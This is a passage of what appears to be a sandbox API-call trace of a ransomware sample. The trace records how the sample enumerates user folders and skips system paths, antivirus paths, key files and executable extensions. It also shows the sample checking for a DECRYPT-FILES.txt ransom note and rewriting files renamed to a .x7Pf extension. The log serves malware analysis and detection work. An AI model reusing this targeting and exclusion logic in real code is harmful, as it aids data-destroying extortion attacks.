ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZBKZBIC", cAlternateFileName="")) returned 1 [0180.605] lstrcmpW (lpString1="DZBKZBIC", lpString2=".") returned 1 [0180.605] lstrcmpW (lpString1="DZBKZBIC", lpString2="..") returned 1 [0180.605] lstrcatW (in: lpString1="DZBKZBIC", lpString2="\\" | out: lpString1="DZBKZBIC\\") returned="DZBKZBIC\\" [0180.605] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="DZBKZBIC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" [0180.605] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Program Files") returned 0x0 [0180.605] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch=":\\Windows") returned 0x0 [0180.605] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Games\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\All Users") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="AhnLab") returned 0x0 [0180.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.606] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0180.606] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.606] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\0a16c9.tmp") returned 107 [0180.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.606] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0180.606] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.606] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\DECRYPT-FILES.txt") returned 114 [0180.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.606] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0180.607] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*" [0180.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.607] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.607] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.607] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.607] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec57aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.607] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.607] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.607] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.607] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.607] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.607] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.607] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned 96 [0180.607] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.607] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\" [0180.607] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\0a16c9.tmp" [0180.607] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.608] CloseHandle (hObject=0x0) returned 0 [0180.608] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.608] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.608] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.608] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.608] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.608] CloseHandle (hObject=0x284) returned 1 [0180.608] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaa9ffbc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.x7Pf", cAlternateFileName="INDEXD~1.X7P")) returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="DECRYPT-FILES.txt") returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="autorun.inf") returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="boot.ini") returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="desktop.ini") returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="ntuser.dat") returned -1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="iconcache.db") returned 1 [0180.608] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="bootsect.bak") returned 1 [0180.609] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="ntuser.dat.log") returned -1 [0180.609] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="thumbs.db") returned -1 [0180.609] lstrcmpiW (lpString1="index.dat.x7Pf", lpString2="Bootfont.bin") returned 1 [0180.609] lstrlenW (lpString="index.dat.x7Pf") returned 14 [0180.609] lstrcmpiW (lpString1="x7Pf", lpString2="lnk") returned 1 [0180.609] lstrcmpiW (lpString1="x7Pf", lpString2="exe") returned 1 [0180.609] lstrcmpiW (lpString1="x7Pf", lpString2="sys") returned 1 [0180.609] lstrcmpiW (lpString1="x7Pf", lpString2="dll") returned 1 [0180.609] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0180.609] lstrlenW (lpString="index.dat.x7Pf") returned 14 [0180.609] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0180.609] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="index.dat.x7Pf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.x7Pf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.x7Pf" [0180.609] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.x7Pf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.x7pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.609] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=33032) returned 1 [0180.609] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.609] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.611] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.611] CloseHandle (hObject=0x288) returned 1 [0180.611] CloseHandle (hObject=0x284) returned 1 [0180.611] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.611] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaabe2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VRLZOZ0E", cAlternateFileName="")) returned 1 [0180.611] lstrcmpW (lpString1="VRLZOZ0E", lpString2=".") returned 1 [0180.611] lstrcmpW (lpString1="VRLZOZ0E", lpString2="..") returned 1 [0180.612] lstrcatW (in: lpString1="VRLZOZ0E", lpString2="\\" | out: lpString1="VRLZOZ0E\\") returned="VRLZOZ0E\\" [0180.612] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="VRLZOZ0E\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Program Files") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch=":\\Windows") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Games\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\All Users") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="AhnLab") returned 0x0 [0180.612] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.612] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0180.612] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.612] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\0a16c9.tmp") returned 107 [0180.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0180.613] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.613] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\DECRYPT-FILES.txt") returned 114 [0180.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0180.613] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*" [0180.613] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.614] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.614] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec7dc00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.614] lstrcmpiW 